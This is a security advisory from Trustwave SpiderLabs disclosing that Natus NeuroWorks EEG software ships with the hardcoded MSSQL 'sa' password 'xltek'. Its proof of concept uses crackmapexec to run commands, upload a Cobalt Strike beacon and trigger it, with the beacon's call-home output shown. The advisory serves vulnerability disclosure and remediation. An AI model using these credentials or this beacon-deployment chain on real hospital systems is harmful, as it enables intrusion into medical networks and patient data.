Trustwave SpiderLabs Security Advisory TWSL2023-006:
Default MSSQL Database Password in Natus NeuroWorks EEG Software
Published: 11/07/2023
Version: 1.0
Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software
Product: NeuroWorks EEG Software
Version affected: Prior to 8.4 GMA3
Product description:
The Natus NeuroWorks platform simplifies the process of collecting, monitoring,
trending and managing data for routine EEG testing, ambulatory EEG, long-term
monitoring, ICU monitoring, and research studies. NeuroWorks systems are
scalable to meet the needs of private practice clinics, hospitals, large
teaching facilities and EEG service providers. Natus NeuroWorks is a
cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies,
exhibiting an advanced software for clinical excellence.
The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies
the management of patient, study and laboratory data. Filter studies by date,
status, diagnosis, or use any built-in editable field to create custom filters
for your unique needs. Track outcomes and filter by statistical indices that are
calculated in the reports. The distributed database automatically updates system
settings across the network to ensure that all workstations have current lab
settings.
Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database
*****Credit: John Jackson of Trustwave
Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and
database for the management of medical research studies connected to the testing
and monitoring software implemented via the Natus NeuroWorks platform. By
default, the MSSQL service utilizes the administrative username 'sa' coupled
with the password 'xltek'. An attacker can utilize the default credentials to
access stored sensitive data or perform administrative functions and MSSQL
queries. In addition, an attacker on the local network could potentionally
leverage the credentials to access the file system of the server and perform
read, write, and execution functions on the disk. Natus recommends against
changing the default password as it will disable MigrateDB's ability to
authenticate silently in instances of new virtual database creation.
Proof of Concept/Summary:
While the instance of default credentials is properly documented within the "XL
Security Site Administrator Reference" guide, Natus specifically recommends
against changing the default credentials.
The document specifically states:
"Each instance of SQL Server also has a system administrator username ('sa').
The default password is 'xltek'; however it can be changed for each instance of
SQL Server. We strongly recommend using the default password for local SQL Server
instances".
Natus recommends against changing the password, because of their MigrateDB
function. The document goes on to say: "MigrateDB is also called silently when a
new 'virtual database' is created through Natus Database - XLDB. In this case,
MigrateDB will not prompt the user for the 'sa' password. If the password for
'sa' has been altered on the local machine from its default, the creation of a
new virtual server will fail".
They do however recommend a workaround, which is to change the password back to
xltek while performing new virtual database creation, and then once again change
back to the default.
## Running the command 'whoami' using default credentials
└─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami'
MSSQL SERVERNAME 1433 SERVERNAME [*] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME)
MSSQL SERVERNAME 1433 SERVERNAME [-] SERVERNAME\sa:xltek table users has no column named pillaged_from_computerid
MSSQL SERVERNAME 1433 SERVERNAME [+] Executed command via mssqlexec
MSSQL SERVERNAME 1433 SERVERNAME --------------------------------------------------------------------------------
MSSQL SERVERNAME 1433 SERVERNAME nt authority\network service
## Writing a cobalt strike beacon to a local windows directory
└─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\Temp\\Events\\armsvc.exe
MSSQL SERVERNAME 1433 SERVERNAME [*] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME)
MSSQL SERVERNAME 1433 SERVERNAME [-] SERVERNAME\sa:xltek table users has no column named pillaged_from_computerid
MSSQL SERVERNAME 1433 SERVERNAME [*] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\Temp\Events\armsvc.exe
MSSQL SERVERNAME 1433 SERVERNAME [*] Size is 409088 bytes
MSSQL SERVERNAME 1433 SERVERNAME [+] File has been uploaded on the remote machine
└─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\Temp\Events\'
MSSQL SERVERNAME 1433 SERVERNAME [*] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME)
MSSQL SERVERNAME 1433 SERVERNAME [-] SERVERNAME\sa:xltek table users has no column named pillaged_from_computerid
MSSQL SERVERNAME 1433 SERVERNAME [+] Executed command via mssqlexec
MSSQL SERVERNAME 1433 SERVERNAME --------------------------------------------------------------------------------
MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows
MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA
MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\Temp\Events
MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM
.
MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM ..
MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe
MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes
MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free
## Triggering the cobalt strike beacon
└─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\Temp\Events\armsvc.exe'
MSSQL SERVERNAME 1433 SERVERNAME [*] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME)
MSSQL SERVERNAME 1433 SERVERNAME [-] SERVERNAME\sa:xltek table users has no column named pillaged_from_computerid
MSSQL SERVERNAME 1433 SERVERNAME [+] Executed command via mssqlexec
MSSQL SERVERNAME 1433 SERVERNAME None
## Beacon command execution proof
beacon> sleep 0
[*] Tasked beacon to become interactive
[+] host called home, sent: 16 bytes
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\NETWORK SERVICE
beacon> run systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 28 bytes
[+] received output:
Host Name: SERVERNAME
OS Name: Microsoft Windows 10 Enterprise 2016 LTSB
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: XXXXX-XXXXX-XXXXX-XXXXX
Original Install Date: 6/6/2017, 5:39:30 PM
System Boot Time: 6/17/2023, 2:07:18 PM
System Manufacturer: Dell Inc.
System Model: OptiPlex 5050
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz
BIOS Version: Dell Inc. 1.11.1, 11/29/2018
Windows Directory: C:\windows
System Directory: C:\windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 8,051 MB
Available Physical Memory: 5,344 MB
Virtual Memory: Max Size: 16,243 MB
Virtual Memory: Available: 13,210 MB
Virtual Memory: In Use: 3,033 MB
Page File Location(s): C:\pagefile.sys
Domain: REDACTED FOR PRIVACY
Logon Server: N/A
Hotfix(s): 6 Hotfix(s) Installed.
[01]: KB4013418
[02]: KB4033631
[03]: KB4049411
[04]: KB4103729
[05]: KB4132216
[06]: KB4103720
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) Ethernet Connection (5) I219-V
Connection Name: LAN
DHCP Enabled: Yes
DHCP Server: X.X.X.X
IP address(es)
[01]: X.X.X.X
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
Virtualization Enabled In Firmware: Yes
Second Level Address Translation: Yes
Data Execution Prevention Available: Yes
Vendor Response:
The vendor has revised the Administrator Reference document by discontinuing the
endorsement of default password usage. Instead, the vendor strongly recommends
that all users change default SQL credentials. This requires to update the
software to leverage the Credentials Cache feature, introduced in version 8.4
GMA3. The technical service team will provide the revised documentation to
customers on request, and in the future, it will be integrated into the
Neuroworks software installation package.
The vendor has additionally released a security advisory regarding this threat.
You can access the security bulletin at this link:
https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf
Remediation Steps:
Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache
feature and update the default SQL credentials.
Revision History:
06/27/2023 - Trustwave disclosed vulnerability to vendor
07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation
07/18/2023 - Vendor has provided Trustwave with remediation plan
10/20/2023 - Vendor publishes security bulletin
11/07/2023 - Advisory published
References
1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf
About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security
risk. With cloud and managed security services, integrated technologies and a
team of security experts, ethical hackers and researchers, Trustwave enables
businesses to transform the way they manage their information security and
compliance programs. More than three million businesses are enrolled in the
Trustwave TrustKeeper® cloud platform, through which Trustwave delivers
automated, efficient and cost-effective threat, vulnerability and compliance
management. Trustwave is headquartered in Chicago, with customers in 96
countries. For more information about Trustwave, visit
https://www.trustwave.com.
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.